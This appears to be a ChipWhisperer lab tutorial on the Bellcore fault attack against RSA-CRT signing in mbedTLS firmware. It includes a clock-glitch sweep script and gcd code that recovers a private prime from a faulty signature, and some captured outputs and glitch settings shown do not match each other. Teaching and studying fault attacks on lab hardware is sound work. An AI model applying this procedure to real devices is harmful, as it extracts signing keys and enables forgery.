# RSA Fault Attack

This advanced tutorial will demonstrate an attack on RSA signatures that use the Chinese Remainder Theorem as an optimization. This tutorial will make use of glitching, so it's recommended that you complete at least Fault_1-Introduction_to_Clock_Glitch_Attacks before attempting this tutorial. 

Additionally, this tutorial has been designed for Arm targets only. Users of other hardware may need to make changes to available RSA libraries to complete this tutorial.

## Attack Theory

We won't cover much about what RSA is (there's a [Wikipedia article](https://en.wikipedia.org/wiki/RSA_(cryptosystem)) for that), but we will give a quick summary.

* RSA is a public-key cryptosystem. It can be used in a few different ways, but in this case we'll be using it to sign messages. In this mode, User A signs a message using their private information, and User B can then use publicly available information to verify that User A was the one who signed it.
* This means that some information (n, e) is public, while other information (d, p, q) is private.

The math of RSA (once you have all the key parts generated) is actually pretty simple. To sign the message, the following equation can be applied (with signature s, message m, private exponent d, and public modulus n):

$$s = m^d \bmod n$$

To verify a signature, the following equation is used (with signature s, public exponent e, message m, and public modulus n):

$$s^e \equiv m \pmod{n}$$
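To make the two equations concrete, here is a minimal Python sketch using the classic toy key $p = 61$, $q = 53$, $e = 17$. These numbers are chosen purely for illustration (real keys are 1024 bits or more), and the message is a small integer rather than a hashed, padded message.

```python
# Toy RSA key: far too small to be secure, for illustration only
p, q = 61, 53
n = p * q                          # public modulus (3233)
e = 17                             # public exponent
d = pow(e, -1, (p - 1) * (q - 1))  # private exponent (2753); needs Python 3.8+

m = 65                             # toy message, must be smaller than n

s = pow(m, d, n)                   # sign:   s = m^d mod n
print("signature:", s)
print("verifies:", pow(s, e, n) == m)  # verify: s^e mod n == m
```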

Despite the simplicity of these equations, signing messages in particular is a very slow operation: the implementation from MBEDTLS, a popular crypto library for Arm devices, takes over 12M cycles for RSA-1024 (and that's with the optimization described in the next section). This is because all of the numbers used in these equations are huge (n and d are 1024 bits long in this case), so any improvement we can make to the speed of this operation is very important. It turns out there is a large speed optimization that we can make.

Other important values for RSA include p and q, which are used as a part of the key generation process and are prime factors of n. RSA's security is reliant on the inability to factor n into p and q.

### Chinese Remainder Theorem (CRT)

Instead of computing $s = m^d \bmod n$ directly, we can use the fact that n is the product of two primes, p and q, such that $n = pq$. As you might have guessed, p and q are the same private information we talked about earlier. Basically, if we learn either one, we'll be able to derive the rest of the private information fairly easily. We won't go into all the math, but here are the important operations:

* Derive $d_p = d \bmod (p-1)$ from d and p, and $d_q = d \bmod (q-1)$ from d and q
* Calculate $s_1 = m^{d_p} \bmod p$ and $s_2 = m^{d_q} \bmod q$
* Combine $s_1$ and $s_2$ into $s$ via the CRT

Since p and q are each only about half the size of n, creating signatures this way is much faster (typically around four times faster). As such, many popular RSA implementations (including MBEDTLS) use the CRT to speed up RSA.
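The three CRT steps can be sketched in Python with the same kind of toy key. The recombination step here uses Garner's formula, $s = s_2 + q\,\big(q^{-1}(s_1 - s_2) \bmod p\big)$, which is one standard way to combine the two halves; it's a sketch, not a copy of MBEDTLS's code, although MBEDTLS likewise keeps precomputed values such as the `DP` and `DQ` seen in the firmware snippet below.

```python
# Toy key, for illustration only
p, q = 61, 53
n, e = p * q, 17
d = pow(e, -1, (p - 1) * (q - 1))

def sign_crt(m, p, q, d):
    """RSA signature m^d mod pq computed with the CRT (Garner recombination)."""
    d_p = d % (p - 1)            # reduced exponent for the mod-p half
    d_q = d % (q - 1)            # reduced exponent for the mod-q half
    q_inv = pow(q, -1, p)        # q^-1 mod p, normally precomputed with the key
    s1 = pow(m, d_p, p)          # s_1 = m^{d_p} mod p
    s2 = pow(m, d_q, q)          # s_2 = m^{d_q} mod q
    h = (q_inv * (s1 - s2)) % p  # Python's % keeps this non-negative
    return s2 + h * q            # s = s_2 (mod q) and s = s_1 (mod p)

m = 65
print(sign_crt(m, p, q, d) == pow(m, d, n))  # same result as the direct method
```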

### Bellcore Attack

Suppose that, instead of everything going smoothly as above, a fault occurs during the calculation of $s_1$ or $s_2$. We'll assume the fault hits $s_2$, turning it into a faulty value $s_2'$, which in turn produces a faulty signature $s'$. Since $s_1$ is still correct, the following holds:

$$s'^e \equiv m \pmod{p} \Rightarrow s'^e - m \equiv 0 \pmod{p}$$
$$s'^e \not\equiv m \pmod{q} \Rightarrow s'^e - m \not\equiv 0 \pmod{q}$$

The result of this is that p is a factor of $s'^e - m$, but q (and therefore n) is not. Since p is also a factor of n, it follows that:

$$p = \gcd(s'^e - m,\ n)$$

Thus, if we introduce a fault in the calculation of $s_2$, we'll be able to recover p (a fault in $s_1$ instead gives us q), and from either prime we can derive all of the private values!
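The attack is easy to reproduce in simulation. The sketch below reuses a toy key, corrupts $s_2$ by adding one (a stand-in for a real glitch; the helper `sign_crt` and its `fault_s2` flag are our own), and recovers p with a gcd. Reducing $s'^e - m$ modulo n before taking the gcd does not change the result, since $\gcd(x \bmod n, n) = \gcd(x, n)$, and it avoids building a huge intermediate integer.

```python
from math import gcd

# Toy key, for illustration only
p, q = 61, 53
n, e = p * q, 17
d = pow(e, -1, (p - 1) * (q - 1))

def sign_crt(m, fault_s2=False):
    """CRT signature; optionally corrupt s_2 to simulate a glitch."""
    s1 = pow(m, d % (p - 1), p)
    s2 = pow(m, d % (q - 1), q)
    if fault_s2:
        s2 = (s2 + 1) % q        # simulated fault: only the mod-q half is wrong
    h = (pow(q, -1, p) * (s1 - s2)) % p
    return s2 + h * q

m = 65
s_good = sign_crt(m)
s_bad = sign_crt(m, fault_s2=True)

# s'^e - m is divisible by p but not by q, so its gcd with n is p
recovered = gcd((pow(s_bad, e, n) - m) % n, n)
print(recovered, n // recovered)   # → 61 53
```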

## Firmware

Next, let's take a look at the RSA implementation we're attacking. For this attack, we'll be using the `simpleserial-rsa` project folder. There are a few files here, but the important one is `simpleserial-rsa-arm.c`, so open it. As you scroll through, you'll find all of our public/private values. Next, navigate to `real_dec()`:

```C
uint8_t buf[128];
uint8_t hash[32];
uint8_t real_dec(uint8_t *pt)
{
     int ret = 0;

     //first need to hash our message
     memset(buf, 0, 128);
     mbedtls_sha256(MESSAGE, 12, hash, 0);

     trigger_high();
     ret = simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign(&rsa_ctx, NULL, NULL, MBEDTLS_RSA_PRIVATE, MBEDTLS_MD_SHA256, 32, hash, buf);
     trigger_low();

     //send back first 48 bytes
     simpleserial_put('r', 48, buf);
     return ret;
}
```

You'll notice that we first hash our message (`"Hello World!"`) using SHA256. This isn't too important now, but it will be important later. Next, we sign the hash using `simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign()`, then send back the first 48 bytes of the signature. The rest of the signature is sent back in separate chunks by `sig_chunk_1()` and `sig_chunk_2()` (directly below this function) to avoid overflowing the CWLite's 128-byte buffer.

We'll actually skip over `simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign()` here, since most of the important stuff actually happens in a different function. You should note, however, that this function has been modified to remove a signature check, which would need to be bypassed in a real attack.

Next, find the function `simpleserial_mbedtls_rsa_private()`, a cleaned-up version of `mbedtls_rsa_private()`, where the signature calculation actually happens:

```C
/*
 * Do an RSA private key operation
 */
static int simpleserial_mbedtls_rsa_private( mbedtls_rsa_context *ctx,
                 int (*f_rng)(void *, unsigned char *, size_t),
                 void *p_rng,
                 const unsigned char *input,
                 unsigned char *output )

```

Scrolling down a bit, we find that this function does indeed use the CRT to speed up the calculation:

```C
    /*
     * Faster decryption using the CRT
     *
     * T1 = input ^ dP mod P
     * T2 = input ^ dQ mod Q
     */
    MBEDTLS_MPI_CHK( mbedtls_mpi_exp_mod( &T1, &T, DP, &ctx->P, &ctx->RP ) );
    MBEDTLS_MPI_CHK( mbedtls_mpi_exp_mod( &T2, &T, DQ, &ctx->Q, &ctx->RQ ) );
```

We'll revisit this firmware later, but for now, let's build it and then move over to our Python script:

```python
PLATFORM = "CWLITEARM"
CRYPTO_TARGET = "MBEDTLS"
CRYPTO_OPTIONS = "RSA"
```

```bash
%%bash -s "$PLATFORM" "$CRYPTO_TARGET" "$CRYPTO_OPTIONS"
cd ../../hardware/victims/firmware/simpleserial-rsa
make PLATFORM=$1 CRYPTO_TARGET=$2 CRYPTO_OPTIONS=$3
```



## Attack Script

Start by initializing the ChipWhisperer:

```python
import chipwhisperer as cw
import binascii

scope = cw.scope()
target = cw.target(scope)

scope.adc.basic_mode = "rising_edge"
scope.clock.clkgen_freq = 7370000
scope.clock.adc_src = "clkgen_x1"
scope.trigger.triggers = "tio4"
scope.io.tio1 = "serial_rx"
scope.io.tio2 = "serial_tx"
scope.io.hs2 = "clkgen"
```

Next, program it with our new firmware:

```python
prog = cw.programmers.STM32FProgrammer
fw_path = "../../hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-CWLITEARM.hex"
cw.programTarget(scope, prog, fw_path)
```

```
Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to programming 43087 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 43087 bytes
```


### Verifying Signatures

Let's start by seeing if we can verify the signature that we get back. First, we run the signature calculation:

```python
import time

target.go_cmd = 't\\n'
scope.arm()
target.go()

# Wait (up to ~0.5 s) for the target to report that it's done
timeout = 50
while not target.isDone() and timeout > 0:
    timeout -= 1
    time.sleep(0.01)

try:
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')
except IOError as e:
    print('IOError: %s' % str(e))

# Give the target time to send the first chunk of the signature, then read it
time.sleep(2)
num_char = target.ser.inWaiting()
output = target.ser.read(num_char, timeout=10)
```

```python
print(scope.adc.trig_count)
```

```
12725653
```


As you can see, the signature takes a long time! For the STM32F3, it should be around 12.7M cycles. Next, let's get the rest of the signature back and see what it looks like.

```python
# Request the second and third chunks of the signature
target.go_cmd = '1\\n'
target.go()
time.sleep(0.2)
num_char = target.ser.inWaiting()
output += target.ser.read(num_char, timeout=10)

target.go_cmd = '2\\n'
target.go()
time.sleep(0.2)
num_char = target.ser.inWaiting()
output += target.ser.read(num_char, timeout=10)
```

```python
print(output)
```




You should see something like:
```
r4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD
z00
r85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D
z00
r7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80
z00
```

We'll need to strip out the extra simpleserial framing (the leading `r` on each response and the `z00` lines). This can be done like so:

```python
# Drop the 'r' prefixes, the 'z00' lines and the newlines
newout = output.replace("r", "").replace("\nz00", "").replace("\n", "")
print(newout)
```

```
4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80
```
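The `replace("r", "")` trick works only because the hex payload is uppercase and never contains an `r`. A slightly more defensive option is to parse the response line by line, keeping the payload of lines that start with `r` and dropping the `z00` lines. The helper `parse_simpleserial_hex` below is hypothetical, not part of the ChipWhisperer API; it assumes the response layout shown above.

```python
def parse_simpleserial_hex(raw):
    """Join the hex payloads of all 'r' response lines, skipping 'z' lines."""
    chunks = []
    for line in raw.splitlines():
        line = line.strip()
        if line.startswith("r"):
            chunks.append(line[1:])   # drop the leading 'r'
    return "".join(chunks)

# The three chunks captured from the target above
sample = (
    "r4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD\n"
    "z00\n"
    "r85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D\n"
    "z00\n"
    "r7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80\n"
    "z00\n"
)
sig_hex = parse_simpleserial_hex(sample)
print(len(sig_hex))   # 256 hex characters = 128 bytes
```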


Then we can convert this hex string to bytes using binascii:

```python
import binascii
sig = binascii.unhexlify(newout)
```

Finally, we can verify that the signature is correct using the PyCryptodome package:

```python
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
from Crypto.Hash import SHA256

E = 0x10001
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
m = b"Hello World!"

hash_object = SHA256.new(data=m)
pub_key = RSA.construct((N, E))
signer = PKCS1_v1_5.new(pub_key)
print(signer.verify(hash_object, sig))
```

```
True
```


If everything worked out correctly, you should see `True` printed above. Now onto the actual attack.
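PyCryptodome hides the details, but PKCS#1 v1.5 verification boils down to the textbook equation $s^e \bmod n$ followed by a comparison against an encoded message. The sketch below rebuilds that encoded message by hand (`00 01`, `FF` padding, `00`, the DER `DigestInfo` prefix for SHA-256, then the hash) and checks it against the signature returned by the target. This encoded value, not the raw string `"Hello World!"`, is the m that the Bellcore attack needs. The helper name `pkcs1_v15_encode_sha256` is our own.

```python
import hashlib

E = 0x10001
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
# Correct signature returned by the target (hex string from above)
sig = int("4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80", 16)

def pkcs1_v15_encode_sha256(message, k):
    """EMSA-PKCS1-v1_5 encoding of SHA-256(message) for a k-byte modulus."""
    digest_info = bytes.fromhex("3031300d060960864801650304020105000420")  # DER prefix for SHA-256
    t = digest_info + hashlib.sha256(message).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

k = (N.bit_length() + 7) // 8            # modulus length in bytes (128 here)
em = pkcs1_v15_encode_sha256(b"Hello World!", k)

# Textbook verification: s^e mod N must reproduce the encoded message exactly
print(pow(sig, E, N) == int.from_bytes(em, "big"))
```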

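### Getting a Glitch

The loop below sweeps `scope.glitch.ext_offset` over a range of clock cycles after the trigger, runs a signature at each offset, and checks what comes back. It assumes the clock glitch module has already been configured; the glitch settings used for this run (`clock_xor` output, `ext_single` trigger) are shown further down.
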
```python
import time
from tqdm import tnrange

def reset_target(scope):
    """Pulse nRST low to recover the target after a crash."""
    scope.io.nrst = 'low'
    time.sleep(0.05)
    scope.io.nrst = 'high'

for i in tnrange(7000000, 7100000):
    scope.glitch.ext_offset = i
    target.go_cmd = 't\\n'
    scope.adc.timeout = 3
    scope.arm()
    target.go()

    timeout = 50
    while not target.isDone() and timeout > 0:
        timeout -= 1
        time.sleep(0.01)

    try:
        ret = scope.capture()
        if ret:
            print('Timeout happened during acquisition')
    except IOError as e:
        print('IOError: %s' % str(e))
    time.sleep(2)
    num_char = target.ser.inWaiting()
    output = target.ser.read(num_char, timeout=10)

    # The correct signature starts with 4F09799, so anything else is interesting
    if "4F09799" not in output:
        if len(output) > 0:
            print(f"Possible glitch at offset {scope.glitch.ext_offset}\nOutput: {output}")
            # Fetch the remaining two chunks of the (possibly faulty) signature
            for cmd in ('1\\n', '2\\n'):
                target.go_cmd = cmd
                target.go()
                time.sleep(0.2)
                num_char = target.ser.inWaiting()
                output += target.ser.read(num_char, timeout=10)
            newout = output.replace("r", "").replace("\nz00", "").replace("\n", "")
            print(f"Full output: {newout}")
            # A full signature is 256 hex characters; an output starting with
            # 0001F is the padded message, not a faulty signature
            if len(newout) == 256 and "r0001F" not in output:
                print("Very likely glitch!")
                break
        else:
            # No response at all: the target most likely crashed, so reset it
            print(f"Probably crash at {scope.glitch.ext_offset}")
            reset_target(scope)
            time.sleep(0.5)
```


```
Probably crash at 7000004
Probably crash at 7000005
Probably crash at 7000006
Probably crash at 7000011
Possible glitch at offset 7000013
Output: r243682155FEDD39F51F9A8CA3FFE923E5579F29A6FA6C2C599E6F29A7F6C8124D21F335A91FAAF8AF67C6D6BAEA89A0B
z00

Full output: 243682155FEDD39F51F9A8CA3FFE923E5579F29A6FA6C2C599E6F29A7F6C8124D21F335A91FAAF8AF67C6D6BAEA89A0BC1120EA646848B997EE0D52B2014CA1363EA75F4D19B27BDB85C8ABD9C78A08B9A206236BEF60D2DE5D6410574D2801470416DA2E72800E4A919756B97CA3B5AF21B6780667B24ED016E8989424D0BD0
Very likely glitch!
```


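Not every glitch that produces output is useful. Sometimes the firmware sends back the PKCS#1 v1.5 padded message itself (`0001FF...FF00`, the SHA-256 `DigestInfo` prefix, then the hash of `"Hello World!"`) rather than a signature; the `"r0001F"` check in the loop above skips these. In the run captured here, re-parsing `output` shows exactly such a message:

```python
newout = output.replace("r", "").replace("\nz00", "").replace("\n", "")
print(newout)
print(len(newout))
```

```
0001FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFzF0FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF003031300D0609608648016503040201050004207F83B1657FF1FC53B92DC18148A1D65DFC2D4B1FA3D677284ADDD200126D9069
259
```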


```python
glitched_sigs = []  # collect glitched outputs for later analysis
glitched_sigs.append(newout)
```


Next, convert the faulty signature from the glitch loop to bytes:

```python
binout = binascii.unhexlify(newout)
print(binout)
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
```

```
b"$6\x82\x15_\xed\xd3\x9fQ\xf9\xa8\xca?\xfe\x92>Uy\xf2\x9ao\xa6\xc2\xc5\x99\xe6\xf2\x9a\x7fl\x81$\xd2\x1f3Z\x91\xfa\xaf\x8a\xf6|mk\xae\xa8\x9a\x0b\xc1\x12\x0e\xa6F\x84\x8b\x99~\xe0\xd5+ \x14\xca\x13c\xeau\xf4\xd1\x9b'\xbd\xb8\\\x8a\xbd\x9cx\xa0\x8b\x9a b6\xbe\xf6\r-\xe5\xd6A\x05t\xd2\x80\x14pAm\xa2\xe7(\x00\xe4\xa9\x19uk\x97\xca;Z\xf2\x1bg\x80f{$\xed\x01n\x89\x89BM\x0b\xd0"
```


For reference, these are the glitch settings used for this run:

```python
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"         # XOR glitch pulses into the clock
scope.glitch.trigger_src = "ext_single"   # one glitch, ext_offset cycles after the trigger
scope.glitch.repeat = 1
scope.glitch.width = -9
scope.glitch.offset = -38.3
scope.glitch.ext_offset = 5770000
scope.io.hs2 = "glitch"                   # send the glitched clock to the target
print(scope.glitch)
```

```
clk_src     = clkgen
width       = -8.984375
width_fine  = 0
offset      = -38.28125
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 5770000
repeat      = 1
output      = clock_xor
```


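With a faulty signature in hand, we can apply the Bellcore attack. Note that m here is not the raw string but the PKCS#1 v1.5 encoded hash that was actually exponentiated:

```python
from math import gcd

def build_message(m, N):
    """PKCS#1 v1.5 encoding (as a hex string) of the SHA-256 hash m (hex) for modulus N."""
    sha_id = "3031300d060960864801650304020105000420"  # DER DigestInfo prefix for SHA-256
    k = (N.bit_length() + 7) // 8                        # modulus length in bytes
    pad_len = k - 3 - len(m) // 2 - len(sha_id) // 2     # number of 0xFF padding bytes
    return "0001" + "ff" * pad_len + "00" + sha_id + m

m = "7F83B1657FF1FC53B92DC18148A1D65DFC2D4B1FA3D677284ADDD200126D9069"  # SHA-256("Hello World!")
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
padded_m = build_message(m, N)

# s'^e - m, reduced mod N: the gcd with N is unchanged, and this avoids
# raising a 1024-bit number to the 65537th power
a = pow(int.from_bytes(binout, "big"), 65537, N) - int.from_bytes(binascii.unhexlify(padded_m), "big")
```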


```python
print((len(hex(N)) - 2) // 2)  # modulus length in bytes
```

```
128
```


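```python
p_test = gcd(a, N)
print(hex(p_test))
```

```
0xc36d0eb7fcd285223cfb5aaba5bda3d82c01cad19ea484a87ea4377637e75500fcb2005c5c7dd6ec4ac023cda285d796c3d9e75e1efc42488bb4f1d13ac30a57
```

This is exactly the prime `P` stored in the firmware (listed again below), so the attack worked.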
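Once p is known, the rest of the private key follows directly. The sketch below (plain Python 3.8+, no hardware needed) derives q and a private exponent d from the recovered p, then re-creates the correct signature for `"Hello World!"` without using the firmware's stored `D`. The derived d is not necessarily numerically identical to the firmware's `D`, but any exponent with $ed \equiv 1 \pmod{(p-1)(q-1)}$ produces the same signatures.

```python
import hashlib

E = 0x10001
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
# Prime factor recovered by the gcd above
p = 0xc36d0eb7fcd285223cfb5aaba5bda3d82c01cad19ea484a87ea4377637e75500fcb2005c5c7dd6ec4ac023cda285d796c3d9e75e1efc42488bb4f1d13ac30a57

q = N // p                       # the other prime factor
phi = (p - 1) * (q - 1)
d = pow(E, -1, phi)              # a valid private exponent (Python 3.8+)
print("p * q == N:", p * q == N)

# PKCS#1 v1.5 encoding of SHA-256("Hello World!") for this modulus
digest_info = bytes.fromhex("3031300d060960864801650304020105000420")
t = digest_info + hashlib.sha256(b"Hello World!").digest()
k = (N.bit_length() + 7) // 8
em = int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

# Sign with the recovered key; should match the correct signature from the target
forged = pow(em, d, N)
print(format(forged, "0256x"))
```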



As a final check, the correct signature can be reproduced on the host from the full private key stored in the firmware:

```python
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
from Crypto.Hash import SHA256
import binascii

E = 0x10001
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
D = 0x24BF6185468786FDD303083D25E64EFC66CA472BC44D253102F8B4A9D3BFA75091386C0077937FE33FA3252D28855837AE1B484A8A9A45F7EE8C0C634F99E8CDDF79C5CE07EE72C7F123142198164234CABB724CF78B8173B9F880FC86322407AF1FEDFDDE2BEB674CA15F3E81A1521E071513A1E85B5DFA031F21ECAE91A34D
P = 0xC36D0EB7FCD285223CFB5AABA5BDA3D82C01CAD19EA484A87EA4377637E75500FCB2005C5C7DD6EC4AC023CDA285D796C3D9E75E1EFC42488BB4F1D13AC30A57
Q = 0xC000DF51A7C77AE8D7C7370C1FF55B69E211C2B9E5DB1ED0BF61D0D9899620F4910E4168387E3C30AA1E00C339A795088452DD96A9A5EA5D9DCA68DA636032AF

hash_object = SHA256.new(data=b"Hello World!")
priv_key = RSA.construct((N, E, D, P, Q))
signer = PKCS1_v1_5.new(priv_key)

print(binascii.hexlify(hash_object.digest()))
print(binascii.hexlify(signer.sign(hash_object)))

print(len(hash_object.digest()))
print(len(signer.sign(hash_object)))
print(len(hex(N)))
```

```
b'7f83b1657ff1fc53b92dc18148a1d65dfc2d4b1fa3d677284addd200126d9069'
b'4f09799f6a59081b725599753330b7a2440abc42606601622fe0c582646e32555303e1062a2989d9b4c265431adb58dd85bb33c4bb237a311bc40c1279528fd6bb36f94f534a4d8284a18ab8e5670e734c55a6ccab5fb5eae02ba37e2d56648d7a13bbf17a0e07d607c07cbb72c7a7a77076376e8434ce6e136832dc95db3d80'
32
128
258
```
